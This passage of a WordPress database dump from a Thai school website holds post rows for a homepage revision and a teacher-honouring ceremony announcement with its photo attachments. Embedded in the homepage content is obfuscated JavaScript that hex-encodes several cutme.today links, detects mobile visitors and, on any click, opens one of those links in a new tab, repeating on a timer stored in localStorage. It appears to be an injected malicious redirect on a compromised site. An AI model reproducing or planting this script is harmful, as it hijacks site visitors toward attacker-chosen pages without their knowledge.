_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-09 14:25:45','2025-06-09 07:25:45','',14,'http://pakhaeng.ssk.in.th/?p=1332',0,'revision','',0),
(1333,1,'2025-06-13 12:02:34','2025-06-13 05:02:34','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 12 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันไหว้ครู เพื่อปลูกฝังให้ผู้เรียนได้เรียนรู้ ให้ความสำคัญและรำลึกถึงพระคุณครู ณ อาคารเฉลิมพระเกียรติ 80 พรรษา โดยมี ผู้อำนวยการเสน่หา พลโสภา เป็นประธานในพิธีในครั้งนี้ กิจกรรมประกอบไปด้วยวจนพิธีกรรม การกล่าวบทบูชาครู พร้อมทั้งร่วมกันร้องเพลงพระคุณที่สาม เพื่อมอบเป็นของขวัญแด่คุณครูในโอกาสวันไหว้ครู</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1334,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1334\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1339,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1339\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1335,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1335\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1338,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1338\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1336,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_5-1024x577.jpg\" alt=\"\" class=\"wp-image-1336\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1337,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_6-1024x577.jpg\" alt=\"\" class=\"wp-image-1337\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1340,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_7-1024x577.jpg\" alt=\"\" class=\"wp-image-1340\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1341,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_8-1024x577.jpg\" alt=\"\" class=\"wp-image-1341\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1342,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_9-1024x577.jpg\" alt=\"\" class=\"wp-image-1342\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1344,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_10-1024x577.jpg\" alt=\"\" class=\"wp-image-1344\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1345,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_11-1024x577.jpg\" alt=\"\" class=\"wp-image-1345\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1343,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_12-1024x577.jpg\" alt=\"\" class=\"wp-image-1343\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1346,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_13-1024x577.jpg\" alt=\"\" class=\"wp-image-1346\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1347,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_14-1024x577.jpg\" alt=\"\" class=\"wp-image-1347\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1348,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_15-1024x577.jpg\" alt=\"\" class=\"wp-image-1348\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1349,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_16-1024x577.jpg\" alt=\"\" class=\"wp-image-1349\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_17-1024x577.jpg\" alt=\"\" class=\"wp-image-1350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111879_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1351\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1352,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111881_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1352\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1353,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111882_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1353\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1354,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111883_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1354\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1355,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111884_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1355\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1356,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111885_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1356\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1357,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/S__76111886_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1357\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','พิธีไหว้ครู  ประจำปีการศึกษา 2568','','publish','closed','closed','','%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b%e0%b8%b5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8','','','2025-06-13 12:02:35','2025-06-13 05:02:35','',0,'http://pakhaeng.ssk.in.th/?p=1333',0,'post','',0),
(1334,1,'2025-06-13 12:01:50','2025-06-13 05:01:50','','LINE_ALBUM_วันไหว้ครู 2568_250613_1','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_1','','','2025-06-13 12:01:50','2025-06-13 05:01:50','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_1.jpg',0,'attachment','image/jpeg',0),
(1335,1,'2025-06-13 12:01:50','2025-06-13 05:01:50','','LINE_ALBUM_วันไหว้ครู 2568_250613_3','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_3','','','2025-06-13 12:01:50','2025-06-13 05:01:50','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_3.jpg',0,'attachment','image/jpeg',0),
(1336,1,'2025-06-13 12:01:50','2025-06-13 05:01:50','','LINE_ALBUM_วันไหว้ครู 2568_250613_5','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_5','','','2025-06-13 12:01:50','2025-06-13 05:01:50','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_5.jpg',0,'attachment','image/jpeg',0),
(1337,1,'2025-06-13 12:01:50','2025-06-13 05:01:50','','LINE_ALBUM_วันไหว้ครู 2568_250613_6','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_6','','','2025-06-13 12:01:50','2025-06-13 05:01:50','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_6.jpg',0,'attachment','image/jpeg',0),
(1338,1,'2025-06-13 12:01:50','2025-06-13 05:01:50','','LINE_ALBUM_วันไหว้ครู 2568_250613_4','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_4','','','2025-06-13 12:01:50','2025-06-13 05:01:50','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_4.jpg',0,'attachment','image/jpeg',0),
(1339,1,'2025-06-13 12:01:51','2025-06-13 05:01:51','','LINE_ALBUM_วันไหว้ครู 2568_250613_2','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_2','','','2025-06-13 12:01:51','2025-06-13 05:01:51','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_2.jpg',0,'attachment','image/jpeg',0),
(1340,1,'2025-06-13 12:01:52','2025-06-13 05:01:52','','LINE_ALBUM_วันไหว้ครู 2568_250613_7','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_7','','','2025-06-13 12:01:52','2025-06-13 05:01:52','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_7.jpg',0,'attachment','image/jpeg',0),
(1341,1,'2025-06-13 12:01:52','2025-06-13 05:01:52','','LINE_ALBUM_วันไหว้ครู 2568_250613_8','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_8','','','2025-06-13 12:01:52','2025-06-13 05:01:52','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_8.jpg',0,'attachment','image/jpeg',0),
(1342,1,'2025-06-13 12:01:52','2025-06-13 05:01:52','','LINE_ALBUM_วันไหว้ครู 2568_250613_9','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_9','','','2025-06-13 12:01:52','2025-06-13 05:01:52','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_9.jpg',0,'attachment','image/jpeg',0),
(1343,1,'2025-06-13 12:01:54','2025-06-13 05:01:54','','LINE_ALBUM_วันไหว้ครู 2568_250613_12','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_12','','','2025-06-13 12:01:54','2025-06-13 05:01:54','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_12.jpg',0,'attachment','image/jpeg',0),
(1344,1,'2025-06-13 12:01:54','2025-06-13 05:01:54','','LINE_ALBUM_วันไหว้ครู 2568_250613_10','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_10','','','2025-06-13 12:01:54','2025-06-13 05:01:54','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_10.jpg',0,'attachment','image/jpeg',0),
(1345,1,'2025-06-13 12:01:54','2025-06-13 05:01:54','','LINE_ALBUM_วันไหว้ครู 2568_250613_11','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_11','','','2025-06-13 12:01:54','2025-06-13 05:01:54','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_11.jpg',0,'attachment','image/jpeg',0),
(1346,1,'2025-06-13 12:01:55','2025-06-13 05:01:55','','LINE_ALBUM_วันไหว้ครู 2568_250613_13','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_13','','','2025-06-13 12:01:55','2025-06-13 05:01:55','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_13.jpg',0,'attachment','image/jpeg',0),
(1347,1,'2025-06-13 12:01:55','2025-06-13 05:01:55','','LINE_ALBUM_วันไหว้ครู 2568_250613_14','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9-2568_250613_14','','','2025-06-13 12:01:55','2025-06-13 05:01:55','',1333,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_14.jpg',0,'attachment','image/jpeg',0),
